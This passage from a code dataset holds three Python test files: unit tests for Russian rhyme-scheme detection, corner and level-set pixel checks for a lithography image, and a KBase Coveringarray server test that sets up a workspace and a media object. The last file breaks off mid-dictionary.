self.poetryRUS = PoetryRU('cmudict/ru_cmudict.json')
self.number = 0
def open_poem(self, poem):
with open(os.path.join('..','poems', 'ru', poem), encoding='utf-8') as f:
return self.poetryRUS.tokenize(f.read())
def open_test(self, test):
with open(os.path.join('..', 'poems', 'test_files', test), encoding='utf-8') as f:
return self.poetryRUS.tokenize(f.read())
def test_easy_rhyme(self):
easy_test = self.open_test('easy_tests.txt')
for pair in easy_test:
print(pair[0], pair[1])
self.assertTrue(self.poetryRUS.rhymes(pair[0], pair[1]))
def test_rhyme(self):
self.assertTrue(self.poetryRUS.rhymes('раскис', 'вниз'))
def test_rhyme_scheme(self):
poem = """В прозрачных пространствах Эфира,
Над сумраком дольнего мира,
Над шумом забытой метели,
Два светлые духа летели."""
tokenized_poem = self.poetryRUS.tokenize(poem)
rhyme_scheme = self.poetryRUS.guess_rhyme_type(tokenized_poem)
print('Rhyme scheme: {}'.format(rhyme_scheme))
def test_hard_rhyme(self):
hard_test = self.open_test('hard_tests.txt')
for pair in hard_test:
print(pair[0], pair[1])
self.assertTrue(self.poetryRUS.rhymes(pair[0], pair[1]))
def test_poem_1(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aa')
def test_poem_2(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aaaa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaaa')
def test_poem_3(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aaabaaabbbabbcdcdb.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaabaaabbbabbcdcdb')
def test_poem_4(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aabb.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aabb')
def test_poem_5(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aabbcc.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aabbcc')
def test_poem_6(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aabbccaa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aabbccaa')
def test_poem_7(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aabbccdd.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aabbccdd')
def test_poem_8(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aabcbc.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aabcbc')
def test_poem_9(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aax.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaX')
def test_poem_10(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aaxa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaXa')
def test_poem_11(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_aaxb.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaXX')
def test_poem_12(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_ab.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'XX')
def test_poem_14(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abab.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abab')
def test_poem_15(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_ababcdcd.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'ababcdcd')
'''def test_poem_16(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_ababcdcdefef.txt'))
for stanza in stanzas:
rhyme_scheme_string, rhyme = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'ababcdcdefef')'''
def test_poem_17(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abaxb.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abaXb')
def test_poem_18(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abba.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abba')
def test_poem_19(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abbaa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abbaa')
def test_poem_20(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abbab.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abbab')
'''def test_poem_21(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_abbabcbcddefef.txt'))
for stanza in stanzas:
rhyme_scheme_string, rhyme = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'abbabcbcddefef')'''
def test_poem_22(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_axa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aXa')
def test_poem_23(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_xaa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'Xaa')
def test_poem_24(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_xabab.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'Xabab')
def test_poem_25(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_xaxbab.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'XaXbab')
def test_poem_26(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('rhyme_axaa.txt'))
for stanza in stanzas:
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanza)
for line in stanza:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aXaa')
def test_poem_27(self):
stanzas = self.poetryRUS.split_into_stanzas(self.open_poem('problems.txt'))
rhyme_scheme_string = self.poetryRUS.guess_rhyme_type(stanzas[0][:4])
for line in stanzas[0]:
print(' '.join(line))
print(rhyme_scheme_string, '\n')
self.assertTrue(rhyme_scheme_string == 'aaaa')
if __name__ == '__main__':
unittest.main()
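# --- Added refactoring sketch (illustrative only; not part of the original suite) ---
# Every test_poem_* case above repeats the same split/guess/assert loop. A helper
# such as this one could express that pattern once. The PoetryRU method names are
# taken from the calls above; the helper name and signature are assumptions.
def _assert_rhyme_scheme(test_case, poem_file, expected_scheme):
    stanzas = test_case.poetryRUS.split_into_stanzas(test_case.open_poem(poem_file))
    for stanza in stanzas:
        scheme = test_case.poetryRUS.guess_rhyme_type(stanza)
        for line in stanza:
            print(' '.join(line))
        print(scheme, '\n')
        test_case.assertEqual(scheme, expected_scheme)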
| 42.242857 | 99 | 0.626564 | 1,446 | 11,828 | 4.851314 | 0.089903 | 0.128582 | 0.189024 | 0.088525 | 0.828083 | 0.814683 | 0.808125 | 0.808125 | 0.801853 | 0.801853 | 0 | 0.006552 | 0.264457 | 11,828 | 279 | 100 | 42.394265 | 0.79977 | 0 | 0 | 0.553097 | 0 | 0 | 0.07434 | 0.004641 | 0 | 0 | 0 | 0 | 0.119469 | 1 | 0.137168 | false | 0 | 0.013274 | 0 | 0.163717 | 0.225664 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b35ed8a98dcaad04bb8a91be98408900fc46e34a | 10,413 | py | Python | models/develset/src/utils/unit_tests/test_case1.py | phdyang007/pytorch-CycleGAN-and-pix2pix | 8057392a37d47a17ac0e8f7cc4642bec86bf2e43 | [
"BSD-3-Clause"
] | 1 | 2022-01-26T00:45:06.000Z | 2022-01-26T00:45:06.000Z | models/develset/src/utils/unit_tests/test_case1.py | phdyang007/pytorch-CycleGAN-and-pix2pix | 8057392a37d47a17ac0e8f7cc4642bec86bf2e43 | [
"BSD-3-Clause"
] | null | null | null | models/develset/src/utils/unit_tests/test_case1.py | phdyang007/pytorch-CycleGAN-and-pix2pix | 8057392a37d47a17ac0e8f7cc4642bec86bf2e43 | [
"BSD-3-Clause"
] | null | null | null | '''
Author: Guojin Chen @ CUHK-CSE
Homepage: https://dekura.github.io/
Date: 2020-12-26 17:07:15
LastEditTime: 2021-04-09 17:00:56
Contact: cgjhaha@qq.com
Description: the unit tests for the case4 target image
'''
from src.models.const import *
'''
8 9
0 1 2
3 x 4
5 6 7
10 11
'''
def test_ul_corner(x, y, type_corner, image, ls):
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 1, 'the {} corner of ({},{}) should be {}'.format(type_corner, x, y, 1)
assert image[px0] == 0, 'the {} corner of ({},{}) position 0 should be {}'.format(type_corner, x, y, 0)
assert image[px7] == 1, 'the {} corner of ({},{}) position 7 should be {}'.format(type_corner, x, y, 1)
assert ls[px] == 0, 'the {} corner levelset of ({},{}) should be {}'.format(type_corner, x, y, 0)
assert ls[px7] == -1, 'the {} corner levelset of ({},{}) position 7 should be {}'.format(type_corner, x, y, -1)
print('test {} corner of ({},{}) passed all checks'.format(type_corner, x, y))
'''
8 9
0 1 2
3 x 4
5 6 7
10 11
'''
def test_ll_corner(x, y, type_corner, image, ls):
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 1, 'the {} corner of ({},{}) should be {}'.format(type_corner, x, y, 1)
assert image[px0] == 0, 'the {} corner of ({},{}) px0 should be {}'.format(type_corner, x, y, 0)
assert image[px7] == 1, 'the {} corner of ({},{}) px7 should be {}'.format(type_corner, x, y, 1)
assert ls[px] == 0, 'the {} corner levelset of ({},{}) should be {}'.format(type_corner, x, y, 0)
assert ls[px7] == -1, 'the {} corner levelset of ({},{}) position 7 should be {}'.format(type_corner, x, y, -1)
print('the {} corner ls[px0] is {}, which should be sqrt(2)'.format(type_corner, ls[px0]))
print('the {} corner ls[px7] is {}, which should be -1'.format(type_corner, ls[px7]))
print('check the output above to confirm that all {} corner tests of ({},{}) pass'.format(type_corner, x, y))
print('\n========================\n')
'''
8 9
0 1 2
3 x 4
5 6 7
10 11
'''
def test_ur_corner(x, y, type_corner, image, ls):
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 0, 'the {} corner of ({},{}) should be {}'.format(type_corner, x, y, 0)
assert image[px0] == 1, 'the {} corner of ({},{}) position 0 should be {}'.format(type_corner, x, y, 1)
assert image[px7] == 0, 'the {} corner of ({},{}) position 7 should be {}'.format(type_corner, x, y, 0)
assert ls[px0] == 0, 'the {} corner levelset of ({},{}) position 0 should be {}'.format(type_corner, x, y, 0)
print('the {} corner ls[px] is {}, which should be sqrt(2)'.format(type_corner, ls[px]))
print('the {} corner ls[px7] is {}, which should be sqrt(8)'.format(type_corner, ls[px7]))
print('check the output above to confirm that all {} corner tests of ({},{}) pass.'.format(type_corner, x, y))
print('\n========================\n')
'''
8 9
0 1 2
3 x 4
5 6 7
10 11
'''
def test_lr_convex(x, y, type_convex, image, ls):
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 1, 'the {} convex of ({},{}) should be {}'.format(type_convex, x, y, 1)
assert image[px0] == 1, 'the {} convex of ({},{}) px0 should be {}'.format(type_convex, x, y, 1)
assert image[px7] == 1, 'the {} convex of ({},{}) px7 should be {}'.format(type_convex, x, y, 1)
assert image[px1] == 0, 'the {} convex of ({},{}) px1 should be {}'.format(type_convex, x, y, 0)
assert ls[px] == 0, 'the {} convex levelset of ({},{}) should be {}'.format(type_convex, x, y, 0)
assert ls[px1] == 1, 'the {} convex levelset of ({},{}) px1 should be {}'.format(type_convex, x, y, 1)
assert ls[px7] == -1, 'the {} convex levelset of ({},{}) px7 should be {}'.format(type_convex, x, y, -1)
assert ls[px9] == 2, 'the {} convex levelset of ({},{}) px9 should be {}'.format(type_convex, x, y, 2)
print('check the output above to confirm that all {} convex tests of ({},{}) pass'.format(type_convex, x, y))
print('\n========================\n')
'''
8 9
0 1 2
3 x 4
5 6 7
10 11
'''
def test_ul_convex(x, y, type_convex, image, ls):
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 1, 'the {} convex of ({},{}) should be {}'.format(type_convex, x, y, 1)
assert image[px0] == 1, 'the {} convex of ({},{}) px0 should be {}'.format(type_convex, x, y, 1)
assert image[px1] == 1, 'the {} convex of ({},{}) px1 should be {}'.format(type_convex, x, y, 1)
assert image[px3] == 0, 'the {} convex of ({},{}) px3 should be {}'.format(type_convex, x, y, 0)
assert image[px5] == 0, 'the {} convex of ({},{}) px5 should be {}'.format(type_convex, x, y, 0)
assert image[px6] == 1, 'the {} convex of ({},{}) px6 should be {}'.format(type_convex, x, y, 1)
assert image[px7] == 1, 'the {} convex of ({},{}) px7 should be {}'.format(type_convex, x, y, 1)
assert ls[px] == 0, 'the {} convex levelset of ({},{}) should be {}'.format(type_convex, x, y, 0)
# assert ls[px1] == 1, 'the {} convex levelset of ({},{}) px1 should be {}'.format(type_convex, x, y, 1)
assert ls[px7] == -1, 'the {} convex levelset of ({},{}) px7 should be {}'.format(type_convex, x, y, -1)
assert ls[px3] == 1, 'the {} convex levelset of ({},{}) px3 should be {}'.format(type_convex, x, y, 1)
print('the {} convex ls[px1] is {}, which should be 0'.format(type_convex, ls[px1]))
print('the {} convex ls[px8] is {}, which should be -1'.format(type_convex, ls[px8]))
print('the {} convex ls[px9] is {}, which should be -sqrt(5)'.format(type_convex, ls[px9]))
print('check the output above to confirm that all {} convex tests of ({},{}) pass'.format(type_convex, x, y))
print('\n========================\n')
'''
x, y are the coordinates in the glp
'''
def test_corner(x, y, type_corner, image, ls):
if type_corner == 'ur':
test_ur_corner(x, y, type_corner, image, ls)
elif type_corner == 'll':
test_ll_corner(x, y, type_corner, image, ls)
else:
raise NotImplementedError('not implemented')
def test_convex(x, y, type_convex, image, ls):
if type_convex == 'lr':
test_lr_convex(x, y, type_convex, image, ls)
elif type_convex == 'ul':
test_ul_convex(x, y, type_convex, image, ls)
else:
raise NotImplementedError('not implemented')
def test_outer(x, y, image, ls):
type_convex = 'outer'
x1 = x + 512
y1 = y + 512
px = (0, 0, y1, x1)
px0 = (0, 0, y1 - 1, x1 - 1)
px1 = (0, 0, y1 - 1, x1)
px2 = (0, 0, y1 - 1, x1 + 1)
px3 = (0, 0, y1, x1 - 1)
px4 = (0, 0, y1, x1 + 1)
px5 = (0, 0, y1 + 1, x1 - 1)
px6 = (0, 0, y1 + 1, x1)
px7 = (0, 0, y1 + 1, x1 + 1)
px8 = (0, 0, y1 - 2, x1 - 2)
px9 = (0, 0, y1 - 2, x1 + 2)
px10 = (0, 0, y1 + 2, x1 - 2)
px11 = (0, 0, y1 + 2, x1 + 2)
assert image[px] == 0, 'the {} convex of ({},{}) should be {}'.format(type_convex, x, y, 0)
assert image[px0] == 0, 'the {} convex of ({},{}) px0 should be {}'.format(type_convex, x, y, 0)
assert image[px1] == 0, 'the {} convex of ({},{}) px1 should be {}'.format(type_convex, x, y, 0)
assert image[px3] == 0, 'the {} convex of ({},{}) px3 should be {}'.format(type_convex, x, y, 0)
assert image[px5] == 0, 'the {} convex of ({},{}) px5 should be {}'.format(type_convex, x, y, 0)
assert image[px6] == 0, 'the {} convex of ({},{}) px6 should be {}'.format(type_convex, x, y, 0)
assert image[px7] == 0, 'the {} convex of ({},{}) px7 should be {}'.format(type_convex, x, y, 0)
assert ls[px] == UP_TRUNCATED_D, 'the {} convex levelset of ({},{}) should be {}'.format(type_convex, x, y, UP_TRUNCATED_D)
# assert ls[px1] == 1, 'the {} convex levelset of ({},{}) px1 should be {}'.format(type_convex, x, y, 1)
assert ls[px7] == UP_TRUNCATED_D, 'the {} convex levelset of ({},{}) px7 should be {}'.format(type_convex, x, y, UP_TRUNCATED_D)
assert ls[px3] == UP_TRUNCATED_D, 'the {} convex levelset of ({},{}) px3 should be {}'.format(type_convex, x, y, UP_TRUNCATED_D)
# print('the {} convex ls[px1] is {}, which should be 0'.format(type_convex, ls[px1]))
# print('the {} convex ls[px8] is {}, which should be -1'.format(type_convex, ls[px8]))
# print('the {} convex ls[px9] is {}, which should be -sqrt(5)'.format(type_convex, ls[px9]))
print('check the output above to confirm that all {} convex tests of ({},{}) pass'.format(type_convex, x, y))
print('\n========================\n')
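# --- Added helper sketch (illustrative only; not part of the original tests) ---
# Each test above hand-writes the same twelve neighbour coordinates around a
# pixel, following the diagram repeated in the docstrings (0-7 are the immediate
# neighbours, 8-11 the diagonal pixels two steps away). A helper like this could
# build those indices once; the function name and return layout are assumptions,
# while the +512 shift mirrors the offset used in the tests.
def _neighbour_pixels(x, y, offset=512):
    x1, y1 = x + offset, y + offset
    deltas = [
        (-1, -1), (-1, 0), (-1, 1),  # positions 0, 1, 2 (row above)
        (0, -1), (0, 1),             # positions 3, 4 (same row)
        (1, -1), (1, 0), (1, 1),     # positions 5, 6, 7 (row below)
        (-2, -2), (-2, 2),           # positions 8, 9 (outer diagonals above)
        (2, -2), (2, 2),             # positions 10, 11 (outer diagonals below)
    ]
    centre = (0, 0, y1, x1)
    neighbours = [(0, 0, y1 + dy, x1 + dx) for dy, dx in deltas]
    return centre, neighbours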
| 42.851852 | 133 | 0.521464 | 1,801 | 10,413 | 2.95447 | 0.062743 | 0.029318 | 0.058636 | 0.148844 | 0.934599 | 0.925578 | 0.922195 | 0.905845 | 0.893629 | 0.856418 | 0 | 0.108496 | 0.257371 | 10,413 | 242 | 134 | 43.028926 | 0.579594 | 0.064823 | 0 | 0.72093 | 0 | 0 | 0.296324 | 0.01479 | 0 | 0 | 0 | 0 | 0.244186 | 1 | 0.046512 | false | 0.034884 | 0.005814 | 0 | 0.052326 | 0.104651 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6428146be1f47649727e610bf6ebecb3343763fb | 20,730 | py | Python | test/Coveringarray_server_test.py | DrewCross/Coveringarray | db8f833f7cbbf16d8800ab3e085e8eeff4c7ed7b | [
"MIT"
] | null | null | null | test/Coveringarray_server_test.py | DrewCross/Coveringarray | db8f833f7cbbf16d8800ab3e085e8eeff4c7ed7b | [
"MIT"
] | null | null | null | test/Coveringarray_server_test.py | DrewCross/Coveringarray | db8f833f7cbbf16d8800ab3e085e8eeff4c7ed7b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import os
import subprocess
import time
import unittest
from configparser import ConfigParser
from Coveringarray.CoveringarrayImpl import Coveringarray
from Coveringarray.CoveringarrayServer import MethodContext
from Coveringarray.authclient import KBaseAuth as _KBaseAuth
from installed_clients.WorkspaceClient import Workspace
class CoveringarrayTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
token = os.environ.get('KB_AUTH_TOKEN', None)
config_file = os.environ.get('KB_DEPLOYMENT_CONFIG', None)
cls.cfg = {}
config = ConfigParser()
config.read(config_file)
for nameval in config.items('Coveringarray'):
cls.cfg[nameval[0]] = nameval[1]
# Getting username from Auth profile for token
authServiceUrl = cls.cfg['auth-service-url']
auth_client = _KBaseAuth(authServiceUrl)
user_id = auth_client.get_user(token)
# WARNING: don't call any logging methods on the context object,
# it'll result in a NoneType error
cls.ctx = MethodContext(None)
cls.ctx.update({'token': token,
'user_id': user_id,
'provenance': [
{'service': 'Coveringarray',
'method': 'please_never_use_it_in_production',
'method_params': []
}],
'authenticated': 1})
cls.wsURL = cls.cfg['workspace-url']
cls.wsClient = Workspace(cls.wsURL)
cls.serviceImpl = Coveringarray(cls.cfg)
cls.scratch = cls.cfg['scratch']
cls.callback_url = os.environ['SDK_CALLBACK_URL']
suffix = int(time.time() * 1000)
cls.wsName = "_test_Cover_" + str(suffix)
ret = cls.wsClient.create_workspace({'workspace': cls.wsName}) # noqa
@classmethod
def tearDownClass(cls):
if hasattr(cls, 'wsName'):
cls.wsClient.delete_workspace({'workspace': cls.wsName})
print('Test workspace was deleted')
def getWsClient(self):
return self.__class__.wsClient
def getWsName(self):
if hasattr(self.__class__, 'wsName'):
return self.__class__.wsName
suffix = int(time.time() * 1000)
wsName = "test_Cover_"+str(suffix)
ret = self.getWsClient().create_workspace({'workspace':wsName})
self.__class__.wsName = wsName
return wsName
def getImpl(self):
return self.__class__.serviceImpl
def getContext(self):
return self.__class__.ctx
# NOTE: According to Python unittest naming rules test method names should start with 'test'. # noqa
def testManualInput(self):
testMedia = {"__VERSION__":1,"id":"kb|media.664","isDefined":0,"isMinimal":0,"mediacompounds":[{"compound_ref":"kbase/default/compounds/id/cpd00205",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00242","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00048","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00009",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00007","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00013","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00971",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00067","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00001","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00036",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00100","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00023","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00027",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd10516","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00058","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00099",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00137","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00063","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00254",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00030","concentration":0.001,"maxFlux":100,"minFlux":-100},
{"compound_ref":"kbase/default/compounds/id/cpd00034","concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00149",
"concentration":0.001,"maxFlux":100,"minFlux":-100},{"compound_ref":"kbase/default/compounds/id/cpd00244","concentration":0.001,"maxFlux":100,"minFlux":-100},
